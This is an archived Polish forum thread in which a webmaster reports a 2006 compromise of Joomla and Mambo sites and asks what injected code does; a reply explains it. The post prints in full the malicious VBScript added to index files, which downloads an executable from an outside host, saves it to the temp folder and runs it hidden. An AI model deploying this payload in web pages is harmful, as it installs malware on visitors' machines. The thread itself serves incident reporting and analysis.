PDA

Zobacz pełną wersję : Włam na Joomla 1.0.11 i Mambo 4.5.4



lechu_b
17-10-2006, 00:24
Witam
W piątek 13.10.2006 zauważyłem naruszenie bezpieczeństwa witryn opartych na Joomla 1.0.11 i Mambo 4.5.4. Atak polegął na dopisaniu do wszystkich plików w katalogach root (/) i /administrator zawierających w nazwie "index" kodu:

<title></title>
<head></head>
<body>
<script language="VBScript">
on error resume next
' due to how ajax works, the file MUST be within the same local domain

dl = "http://www.55man.com/file/mau7du8889iwnuykdpqmkcjklqwenzxgdb/AdMin.exe"

' create adodbstream object
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
' xml ajax req
str6="GET"
x.Open str6, dl, False
x.Send
' Get temp directory and create our destination name
fname1="bl4ck.com"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2) ' Get tmp folder
fname1= F.BuildPath(tmp,fname1)
S.open
' open adodb stream and write contents of request to file
' like vbs dl+exec code
S.write x.responseBody
' Saves it with CreateOverwrite flag
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script>
<head>
<title>[BL4CK] || 404 Not Found</title>
</head><body>
<h1><hr>
<!-- <script>location.href='http://google.com'</script> -->
</body>
</html>
Kod dopisany został na końcu kazdego pliku index*.php i na początku każdego pliku index*.html w ww. katalogach. Skutkiem czego w momencie wejścia na stronę przy pomocy IE Norton Internet Security "krzyczał" o próbie zainstalowania trojana. Listing powyżej wskazuje na Visual Basic, którego nie znam więc może ktoś z was go odczyta i powie co, oprócz załadowania *.exe, wykonuje ten skrypt.
Jeszcze nie wiem jak do tego doszło. Czy ktoś z Was miał podobny problem?

nexus246
17-10-2006, 17:32
Ten skrypt ściąga do tempa i odpala plik exe.